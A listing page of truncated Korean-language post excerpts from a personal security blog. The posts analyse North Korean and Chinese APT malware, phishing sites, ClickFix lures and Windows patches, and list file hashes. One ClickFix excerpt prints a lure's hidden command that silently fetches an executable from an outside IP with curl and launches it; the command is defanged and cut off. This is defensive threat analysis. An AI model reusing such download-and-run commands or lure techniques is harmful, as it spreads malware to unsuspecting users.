아이폰을 대상으로 한 악성 스파이웨어 공격이 감지되었다는 애플 위협 알림을 받으셨다면 당신만 그런 것이 아닙니다.애플은 2026년 8월 13일에 110개국 특정 사용자들에게 새로운 위협 알림을 발송했다고 확인했습니다.해당 기능 자체는 새로운 것이 아닙니다.애플은 2021년부터 고도로 표적화된 스파이웨어 공격을 감지할 때마다 매년 여러 차례 이러한 위협 알림을 보내왔습니다.또한, 애플은 개별 알림의 대상이 되는 스파이웨어를 특정하지 않으므로 오늘 받은 알림이 페가수스와 구체적으로 관련이 있다는 증거는 없다는 점도 지적할 필요가 있습니다.하지만, 애플 자체도 NSO 그룹의 페가수스를 이러한 유형의 공격과 연관된 용병 스파이웨어의 예로 들고 있으며 이전 애플 위협 알림에 대한 포렌식 조사에서 일부 사례가 페가..
오늘은 Kimsuky(김수키) 에서 만든 악성코드인 작물보호제 공급 검토 품목 제안서.lnk 에 대해서 알아보겠습니다.일단 미끼 PDF 파일은 한국의 작물보호제, 농약 제조, 수입, 유통 업체의 영업, 구매, 조달, OEM 담당자 즉 국내 농화학 업계 대상으로 한 것으로 추측됩니다.북한 해커 집단이 김수키(Kimsuky)에서 탈취를 하려고 하는 목적은 다음과 같이 추측을 할 수가 있습니다.작물보호제 제품 기술자료: 제형 설계자료, 제품 규격, 제조·품질관리 관련 내부 문서, 안정성 자료연구개발 자료: 신규 유효성분 검토자료, 혼합제 개발계획, 시험 결과, 저항성 대응 연구등록 인허가 자료:약효·약해 시험, 잔류시험 독성·안전성 자료, 작물별 등록 자료생산기술: 생산공정 문서, 품질관리 기준, 원료 규격,..
오늘은 일본인을 대상으로 이메일 통한 정보 탈취 악성코드(AgentTesla) 인 20260804-000581.js 에 대해서 알아보겠습니다.파일명:20260804-000581.js사이즈:2 MBMD5:483b7b73f19fd2029f4503c7b7c35840SHA-1:bd88e2c9353872c232055ac09ba65ca546bf45a5SHA-256:6cea60db12dcf7def057c16a09f848aa87718cb52cf5266c3566e78c1e823ef8Agent Tesla 악성코드는 이메일에 첨부 파일을 통해서 사용자를 공격하면 압축을 풀고서 Agent Tesla는 시스템에 설치된 브라우저를 검색하고 로그인 자격 증명을 추출하는 목적을 가진 악성코드입니다.20260804-000581.js ..
마이크로소프트에서 제공하는 운영체제인 윈도우 10,윈도우 11 에 대한 보안 업데이트가 진행이 되었습니다.제로데이 취약점 2건을 포함하여 총 400건의 취약점176 권한 상승 취약점11가지 보안 기능 우회 취약점110가지 원격 코드 실행 취약점86가지 정보 유출 취약점12 가지서비스 거부 취약점21가지 스푸핑 취약점 악용되고 있는 취약점CVE-2026-68820:WinSock용 Windows 보조 기능 드라이버 권한 상승 취약점마이크로소프트는 WinSock용 Windows 보조 기능 드라이버에서 시스템 권한을 부여하는 데 악용되던 취약점을 패치마이크로소프트는 윈소크(WinSock)용 윈도우 보조 기능 드라이버의 사용 후 해제(Use after free) 기능 때문에 권한이 있는 공격자가 로컬에서 권한을 ..
오늘도 즐겁게 탈북민 수의축산 출신 조xx 박사를 노린 Kimsuky(김수키)에서 만든 악성코드-Review.chm에 대해서 분석을 한번 해 보겠습니다.파일명:Review.chm사이즈:1 MBMD5:e092e459bf259a8fc372d152c4a84245SHA-1:4d9e2af49ebd0e4e490b4e2f85797da9244a16a4SHA-256:0efbd18c77479b458078521c18bdad84852b71250122a17cb8105c10d3df38d4이며 chm 즉 윈도우 도움말인 것처럼 하는 해당 부분은 거짓말을 해 놓은 악성코드임해당 악성코드는 북한에서 수의사 겸 축산 전문 공무원으로 일하고 있다가 탈북한 수의사 출신 조XX 박사를 노린것으로 추정이 되는 악성코드입니다.먼저 해당 악성코드..
오늘은 VPN을 무력화한 GDID 텔레메트리와 안티포렌식 대응 방법에 대해 글을 적어보겠습니다. 일단 해당 문제는 제 쓰레드 및 페이스북을 보시분들은 미리 알았던 내용일 것입니다. 해당 사건은 Scattered Spider 해커 검거 과정에서 FBI가 법원에 합법적으로 영장을 발부받아서 피의자 피터 스토크스 (Peter Stokes,19세)를 검거 과정에서 드러난 문제입니다.해커는 추적을 피하려고 VPN과 프록시 네트워크로 IP 주소를 철저히 우회하며 해킹을 했고 검거가 되었습니다. 문제가 되는 부분이 GDID 부분입니다.GDID는 다음과 같은 역할을 합니다.마이크로소프트는 시스템 운영과 보안,서비스 제공을 위해 GDID를 활용정품 인증 & MS Store 라이선스계정에 귀속된 디지털 라이선스 및 앱 구..
연구진은 최근 Spectre v2 추측 실행 사이드채널 공격에 대한 완화 조치를 우회하는 방법을 발견했고 리눅스 시스템에서 기밀 정보를 유출하는 익스플로잇을 개발이번 방법은 분기 예측기를 정화하거나 격리하는 방식에 의존하는 AMD 및 인텔 프로세서의 Spectre v2 방어 체계를 무력화시키면 연구진은 이를 일반적으로 중화 기반 완화 조치라고 부름스펙터 v2는 BTI(Branch Target Injection)라고도 불리며 스펙터 계열 취약점의 변종 입니다.이본 공격은 프로세서의 간접 분기 예측기를 악용하여 간접 분기의 대상을 잘못 예측하게 함으로써 공격자가 조작한 코드 경로를 따라 투기적 실행이 이루어지도록 유도최신 프로세서는 분기 예측을 통해 가장 가능성이 큰 실행 경로를 추측하고 분기 결과가 확인되..
오늘은 Mustang Panda 추정 일본 외무성, 방위성 노린 것으로 추정되는 악성코드-新段階に入った日印の戦略的関係.pdf.lnk에 대해서 글을 적어보겠습니다.일단 Mustang Panda라고 추정되는 이유는 중국은 일본-인도 간의 밀착 및 Quad를 통한 대중국 견제 움직임을 주시하는 것이 중국이기 때문파일명:新段階に入った日印の戦略的関係.pdf.lnk사이즈:1 MBMD5:ea346f9f4baa4ddc72d08a1d65d1a6bfSHA-1:b4a873659dae45e3300c4e2494d03cea3f3bbaf4SHA-256:44dc1939dcaea681f5c39ed6f5f81a80ca5f59e72be7f938ac3afe5adb484042일단 제목으로 보고 추축을 하면 공격 대상은 다음과 같이 요약을 할..
오늘은 북한 라자루스(Lazarus)로 추정 구글 크롬 웹 스토어 악성코드 분석-YouTube Translator: Captions, Transcript & AI Summary로 유포되고 있는 악성코드를 분석해 보겠습니다. 먼저 해당 악성코드는 ChatGPT를 통해 YouTube 영상의 자막을 제공하고 100개 이상의 언어로 번역하며, 클릭 한 번으로 요약 기능을 이용할 수 있습니다. 라고 돼 있으며 구글 크롬 부가기능을 사용하는 분들을 대상으로 감염을 시도합니다.hxxps://chromewebstore(.)google(.)com/detail/youtube-translator-captio/pacbinlicgenenkelgfngadgpghfjjcl?pli=1YouTube Translator: Caption..
오늘은 구글의 AI가 이제 사용자의 이메일과 첨부 파일(은행 명세서부터 세금 서류, 의료 편지까지)을 스캔할 수 있으며 기본적으로 활성화되어 있습니다. 이를 끄는 방법에 대해 알아보겠습니다.일단 이게 눈에 잘 띄게 돼 있지 않은 것이 문제 사용자가 일일이 찾아서 꺼야 하는 것이 문제입니다.먼저 컴퓨터 기준으로 설명합니다.설정->모든 설정 보기->스마트 기능 및 개인화->Gmail, Chat, Meet의 스마트 기능 끄기->변경 사항 저장.첫 번째 설정만으로는 충분하지 않음Google Workspace 스마트 기능: Workspace 스마트 기능 설정 관리->두 체크박스 모두 해제->저장여기서 안드로이드와 애플에서 지메을 사용을 하고 있다고 하면 추가 설정 필요설정->계정 탭 하기->스마트 기능 및 개인화..
오늘은 호텔 Wi-Fi 공격을 통해 맞춤형 악성 소프트웨어를 사용하여 Microsoft 365 계정 공격을 했다는 소식입니다.마이크로소프트는 호텔 레스토랑 등의 Wi-Fi(와이파이) 네트워크를 표적으로 삼은 전 세계적인 공격 캠페인이며 APT29로도 알려진 러시아의 위협 행위자 미드나이트 블리자드(Midnight Blizzard) 와 연관되어 있다고 합니다.해당 활동은 사이버보안 기업 릴리아퀘스트(ReliaQuest)의 보고서를 통해 공개된 바 있으며 해당 보고서에서는 공격자가 Wi-Fi 기기의 DNS 설정을 변경해 마이크로소프트 365 계정을 탈취한 방법을 상세히 설명했습니다.마이크로소프트는 배후를 미드나이트 블리자드의 하위 클러스터인 스톰-2945(Storm-2945) 로 추적된 러시아 해커들에게 돌..
오늘은 노드 VPN IP 우회를 해주는 NordVPN 글을 적어 보겠습니다. NordVPN은 유료 개인용 가상사설망 서버이며 윈도우, MacOS, 리눅스를 지원하고 있으며 스마트폰에서는 안드로이드와 iOS 를 지원을 하고 있습니다.그리고 안드로이드 TV에서 사용할 수가 있습니다.노드 VPN의 본사는 데이터 보존법의 의무가 없으며 여기서 제일 중요한 것은 5개의 눈(Five Eyes), 14개의 눈 (Fourteen Eyes) 해당 동맹에서 안전하며 파나마에 있습니다.그리고 2019년 10월 29일 노드 VPN은 노-로그 감사 보고서를 공개 보안 컨설팅 회사와 파트너십을 맺고 램 서버로 인프라 교체, 버그 바운티 프로그램 그리고 2022년 6월에서는 인도는 VPN 회사와 ISP에게 5년 이상 고객 데이터를..
꿈을 꾸는 파랑새 블로그를 사카이(Sakai)입니다.일단 저의 블로그는 이야기를 담는 블로그입니다.개인적으로 공부도 할 겸 악성코드, 피싱 사이트 등을 분석하고 해당 블로그를 운영하고 있습니다. 일단 나름대로 부족하지만, 해당 블로그를 운영하고 있습니다.블로그를 좋게 생각하신다면, 해당 블로그를 긍정적으로 평가하고 계신다면, 금액은 상관없이 블로그가 발전할 수가 있게 음료수 한잔이라도 사서 마시라고 도와주시면 대단히 감사하겠습니다.(I'm passionate about cybersecurity and spend my time analyzing malware and phishing sites. I share my findings on my blog to help others better understan..
마이크로소프트는 8GB RAM을 탑재한 PC의 성능을 향상시키기 위해 Windows 11의 메모리 사용량을 줄이는 작업을 진행 중입니다.이는 Windows 총괄 책임자인 파반 다불루리(Pavan Davuluri)가 2026년 남은 기간 중점적으로 다룰 4대 분야 중 하나나머지 분야로는 온보딩 및 설정, 가족용 기능, 음성 입력이 있습니다.해당 계획은 Windows 11에 대한 주요 비판 사항을 해결하기 위해 지난 3월에 시작된 노력을 바탕으로 하며마이크로소프트는 메모리 최적화 작업에 대한 구체적인 기술적 접근 방식을 밝히지 않았습니다.8GB RAM PC를 위한 윈도우 11 메모리 최적화마이크로소프트는 8GB RAM 장치에서 더 빠르고 반응성이 뛰어난 사용자 경험을 제공하기 위해 윈도우 11의 메모리 사용..
오늘은 자기소개서로 위장한 김수키(Kimsuky)에서 만든 악성코드인 이x연 자기소개서.pdf.lnk 에 대해서 글을 적어 보겠습니다.파일명: 이X연 자기소개서.pdf.lnk사이즈:1 MBMD5:5577fffb5b5acd3771ef9dc696498f1eSHA-1:96f7e28184e2e08fae0b76175d813346f9e24db3SHA-256:863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1악성코드 분석1.Windows 바로 가기 파일로 위장하고 있으며 구글 크롬이 설치된 경우에는 구글 아이콘이 표시될 것입니다.namestring: Type:Hangul Document: 사용자에게는 이 파일이 '한글(HWP) 문서'인 것처럼 보이도록 ..
KTM 모바일 알뜰폰 셀프 개통(자가 개통) 방법 및 친구초대 이벤트 가입 방법에 대해 알아보겠습니다.일단 개인적으로 해당 KTM 모바일 알뜰폰 을 사용을 하고 있다가 전화번호가 하나 더 필요해서 어차피 태블릿 쪽을 유모바일 사용을 하고 있다가 KT M모바일은 케이티아이에스(kt is)의 자회사 케이티엠모바일에서 운영하는 MVNO 통신사를 하는 것으로 옮기기로 하고 해당 KTM 모바일 알뜰폰 쪽으로 셀프개통을 진행을 하기로 했습니다.어차피 메인폰 KT, 인터넷 KT, 업무용 폰도 KT인데 그냥 KT로 그냥 다 통일하는 것이 좋을 것 같아서 해당 태블릿을 KT로 변경해 버렸습니다.친구 추천 1만5천원 요금제 가입시 개인당:최대 15만원 지급 가입시 3만원 혜택 입니다.일단 유심은 편의점에서 구매하든 쿠팡 ..
오늘은 빅로브(BIGLOBE, ビッグローブ)는 일본의 주요 인터넷 서비스 제공업체(ISP) 및 통신 기업 사용자를 노린 피싱(Phishing) 사이트인 votingonline(.)co(.)in 에 대해서 분석을 해 보겠습니다.피싱(Phishing) 사이트 분석피싱 사이트 내용本日は 2026年7月28日(火)です。 現在の時刻は 21時 24分 43秒 です。お知らせ・iOS18へのアップデートにともなう、BIGLOBEメールの動作不具合についてNew!・BIGLOBEメール、メールサービスのメンテナンス情報はこちらをご確認ください。・Webメールにログインが出来ない場合はこちらをご確認ください。・BIGLOBEを騙るフィッシングサイト・フィッシングメールにご注意ください推奨環境 ヘルプ よくあるお問い合わせ 必ずお読みください 한국어 번역오늘은 20..
TechSpot이 인용한 로이터 보도에 따르면 삼성전자(Samsung Electronics)는 브로드컴(Broadcom)과의 반도체 협력 관계를 AI 칩 분야에 집중하도록 확대했으며 이 계약의 총 규모는 2030년까지 2,000억 달러를 넘어설 것으로 예상합니다.이번 협약은 메모리 칩 수탁 생산, 첨단 패키징을 포함하며 2030년까지 지속하며. 브로드컴의 차세대 통신 칩은 삼성의 2나노미터 미만 공정을 통해 생산될 예정이며, 양사는 차세대 고대역폭 메모리 개발에도 협력할 계획이다.이번 협약을 통해 브로드컴은 삼성의 생산 역량을 더욱 폭넓게 활용할 수 있게 되었으며, 삼성의 첨단 제조 시설에 대한 장기적인 수요도 확보하게 되었다.삼성전자와 브로드컴, AI 칩 파트너십 확대이번 파트너십은 브로드컴의 ASIC..
스팀 토론 게시판에서 클릭픽스(ClickFix) 공격이 악용되고 있습니다.이번 공격은 게임과 컴퓨터 문제 해결 방법인 척하지만 실제로는 사용자 컴퓨터와 노트북을 암호화폐 채굴 프로그램을 감염시키는 것이 목적입니다.악의적인 목적을 가진 행위자들은 무작위로 스팀 계정을 생성해 게임 충돌, 인벤토리 아이템 손실 및 기타 기술적 문제에 대한 사용자들의 게시물에 도움이 될 듯한 해결책을 올리고 있으며 악의적인 행위자들은 게시물에 답글을 달아 다른 회원들에게 관리자 권한으로 PowerShell을 열고 문제를 해결하기 위한 명령어를 실행하라고 지시그러나 해당 명령어를 실행하면 XMRig 채굴기 실행 파일이 몰래 악성코드 가 다운로드 되어 컴퓨터에서 실행되기 위한 전략을 사용합니다.이러한 유형의 공격은 클릭픽스(Cli..
오늘은 폴란드 영화인 갈리치아-볼히니아 학살 를 다룬 영화-증오(Wołyń',2016)에 대해서 알아보겠습니다.영화의 배경을 알려고 역사를 조금 알아야 합니다.해당 역사는 2차 세계대전 중 우크라이나 일대에 살던 폴란드인, 유대인들이 우크라이나 민족주의 집단에 의해 학살당한 사건으로 희생자의 정확한 수는 알려지지 않았지만, 역사가들은 약 5만 명의 폴란드인이 살해되었고 보복으로 2~3천 명의 우크라이나인이 학살한 역사를 다루고 있습니다.해당 영화는 우크라이나 민족주의자 조직(OUN),우크라이나 반란군(UPA) 와 관련된 단체이며 최근 러시아-우크라이나 전쟁 중인 현재 젤렌스키 우크라이나 대통령이 OUN 산하 군사조직 UPA(우크라이나반란군) 이름을 자국군 부대 명예 칭호로 쓰면서 시작된 역사 문제이기도 ..
오늘은 Kimsuky(김수키) 로 추정되는 악성코드인 [별첨2]_인지시점_정정신고_추가_증적자료_FAQ.lnk 에 대해서 분석을 해보겠습니다. 해당 악성코드는 공격 대상은 보험사, 금융사, 보안팀, 감사팀, 법무팀, 총무팀 등으로 추정할 수가 있습니다.일단 해당 악성코드는 한국에서 의료 관광을 하는 사이트에다가 악성코드를 심었으며 안과, 코 성형, 보톡스, 얼굴 윤곽, 피부관리, 임플란트, 지방 흡입, 모발 이식, 건강검진 등을 다루는 의료관광 업체이면 현재는 작동 안 됨파일명:[별첨2]_인지시점_정정신고_추가_증적자료_FAQ.lnk사이즈:45 MBMD5:9a2669460b7242a4a7e4834c29c1c7edSHA-1:cef4a19e10c4ce29833a135cac96585dd50a2e13SHA-25..
오늘은 (경북대)62230_1_농식품분야 AX 세부 추진현황 관련 조사 양식 악성코드에 대해 분석을 해 보겠습니다.해당 악성코드는 디코이가 가짜인 악성코드입니다. 기본적으로 디코이 문서는 보여 주어야 하는데 해당 악성코드는 무려 3.40MB 이지만 파일을 실행하면 뜬금없이 SKT, KT, LGU 인터넷 개통 시 요금제 약정 및 개통에 관한 문의 문서가 보임파일명:(경북대) 62230_1_농식품분야 AX 세부 추진현황 관련 조사 양식사이즈:4 MBMD5:59b0c45d4cba37aa060a1e4fc763d320SHA-1:a3ede66911da1c0ce5e25164f59310de2c6c1a5dSHA-256:afaca459c8ae07447aa1492a8e5eb33da7959e81279d7e5fad933ec8d..
최근 공개된 윈도우 제로데이 취약점을 해결하는 비공식 패치가 무료로 제공되고 있습니다.이번 취약점을 악용하면 공격자가 최신 윈도우 시스템에서 권한을 상승시킬 수 있는 문제가 발생합니다.이번 취약점(LegacyHive 라고 명명되었으며 추적을 쉽게 하려고 CVE ID는 부여되지 않았음) Nightmare Eclipse이라는 보안 연구원이 Windows 사용자 프로필 서비스에서 발견Nightmare Eclipse는 마이크로소프트가 2026년 7월 패치 화요일 업데이트를 발표한 날 해당 보안 취약점을 공격에 악용하기 어렵게 만들려고 간소화된 개념 증명 익스플로잇과 함께 공개PoC를 분석하고 Tharros의 수석 취약점 분석가인 Will Dormann은 관리자가 아닌 사용자도 LegacyHive를 악용하여 클래..
오늘은 마이크로소프트 온라인 워드 사칭 ClickFix 공격 사이트 분석을 해보는 시간을 가져 보겠습니다.해당 클릭픽스(ClickFix) 사이트는 Microsoft Word Online인 것처럼 꾸미는 것이 특징입니다.여기서 The "Word Online" extension is not installed in your browser. To view the document offline, click the "How to fix" button. 이라는 부분처럼 How to fix 부분을 누르게 되면 다음과 같은 코드들이 실행합니다. const hiddenPart = 'cmd (/)c start "" /min curl -s -o %APPDATA%\\SearchIndex(.)exe hxxp://193(.)233..
7-Zip 버전 26.02는 공격자가 특수하게 제작된 압축 파일을 사용자가 열도록 유도하여 악성 코드를 실행할 수 있는 원격 코드 실행 취약점을 수정하기 위해 업데이트 되었습니다.룬분(Lunbun) 연구원 랜던 펭(Landon Peng)이 공개한 이 취약점은 7-Zip이 XZ로 압축된 데이터를 처리하는 과정에서 발생합니다.제로데이 이니셔티브(Zero Day Initiative) 의 권고에 따르면 특수하게 조작된 XZ 데이터는 힙 기반 버퍼 오버플로를 유발하여 공격자가 사용자 권한으로 임의 코드를 실행할 수 있도록 할 가능성이 있습니다. 제로데이 이니셔티브(Zero Day Initiative) 의 권고에 따르면 특수하게 조작된 XZ 데이터는 힙 기반 버퍼 오버플로를 유발하여 공격자가 사용자 권한으로 임의 ..
오늘은 Kimsuky(김수키)에서 만든 악성코드인 입력자료.lnk 에 대해서 글을 적어 보겠습니다.파일명:입력자료.lnk사이즈:1 MBMD5:8c0f1a9e261ffb4788efeaba88fcb5f3SHA-1:4f3d5d2f24d472f789bf55e6802c6cb1e23215f0SHA-256:eca45bd69ae2374cd5d9dd7373c03812bea53a3782e4cf24aae12c3d2cb41956악성코드 분석1.PowerShell 코드 실행$Savepath 명령어를 사용해서 미끼 엑셀 파일(.xlsx)을 추출해서 실행하기 위한 코드악성코드 내에서 파일 추출시작 오프셋:10,276바이트추출 길이:8,382바이트출력 파일: 입력자료.xlsx정상 XLSX처럼 보이는 데이터를 LNK 파일 뒤쪽에 붙여..
오늘은 직원 설문조사 보고서로 위장한 Remcos 트로이 목마 악성코드인 직원 설문조사 보고서.vbs 에 대해서 알아보겠습니다.Remcos는 일반적으로 피싱 공격을 통해 유포하는 트로이 목마이며 주로 송장 또는 주문이라고 위장을 하고 있으며 Remcos 특징은 다음과 같습니다.권한 상승:Remcos는 감염된 시스템에 대한 관리자 권한을 얻고 UAC(사용자 계정 제어)를 비활성화할 수 있습니다. 이런 방법을 통해서 공격자가 악성코드 실행이 더 쉬워집니다.방어 회피:Remcos는 프로세스 인젝션을 사용하여 합법적인 프로세스 내에 자신을 포함하므로 안티바이러스 이 탐지하기가 어려워지며 또한 악성코드는 백그라운드에서 실행되어 사용자로부터 자신을 숨길 수 있습니다.데이터 수집:Remcos 멀웨어의 핵심 기능 중 ..
마이크로소프트에서 제공하는 운영체제인 윈도우 10,윈도우 11 에 대한 KB5101650,KB5099414,KB5099539 보안 업데이트가 진행이 되었습니다.이번 보안 업데이트는 취약점 1건을 포함하여 총 570건의 취약점을 수정했습니다.254 권한 상승 취약점17가지 보안 기능 우회 취약점145가지 원격 코드 실행 취약점102가지 정보 유출 취약점35가지 서비스 거부 취약점16가지 스푸핑 취약점 이 수정이 되었습니다.Windows 10 KB5099539 신기능OLE 자동화(알려진 문제) 수정됨: 2026년 6월 보안 업데이트로 인해 발생한 OLE 자동화(oleaut32.dll)의 호환성 문제를 해결합니다.같은 기본 저장소를 공유하는 BYREF 매개변수를 사용하여 COM 메서드를 호출하기 위해 IDis..
오늘은 281개의 무료 안드로이드 VPN 앱 트래픽 유출 암호화되지 않은 데이터 사용자 추적 문제가 발견된 내용에 대해서 글을 적어 보겠습니다.연구원들은 구글 플레이 스토어에서 가장 인기 있는 무료 VPN 앱 281개를 새로운 테스트 시스템으로 분석한 결과 많은 앱들이 사용자들이 VPN을 설치하는 가장 기본적인 이유 즉 트래픽을 비공개로 안전하게 보호하는 기능을 제대로 수행하지 못하는 것으로 나타났다.하나 이상의 문제가 있는 것으로 표시된 앱들은 24억 회 이상 설치되었음문제는 복잡한 것이 아니라 기본적인 것들이며 29개의 앱은 암호화된 터널 외부로 사용자 트래픽이 유출되도록 허용하는데 여기에는 사용자가 방문하는 웹사이트를 드러내는 DNS 조회 정보도 포함되며 61개의 앱은 일부 데이터를 평문으로 전송하..
2008년 미국의 게이브리얼 와인버그(Gabriel Weinberg)가 만든 검색 엔진 이자 브라우저를 제공하는 DuckDuckGo 브라우저에서 YouTube 광고 차단 기능 내장을 한 브라우저를 출시했습니다.광고 차단 기능을 내장하여 대부분의 동영상 광고가 재생 전과 재생 중에 표시되지 않도록 차단을 하는 기능입니다.해당 기능은 iOS, Mac, Windows용 DuckDuckGo 최신 버전에서 기본적으로 활성화되어 있으며 안드로이드 사용자는 설정->광고 차단에서 수동으로 켤 수 있습니다.해당 시스템은 uBlock Origin에서 제공하는 커뮤니티 관리 필터 목록과 DuckDuckGo 자체 호환성 규칙을 함께 사용하면 광고 차단 기능은 DuckDuckGo에 내장된 YouTube 플레이어인 Duck Pl..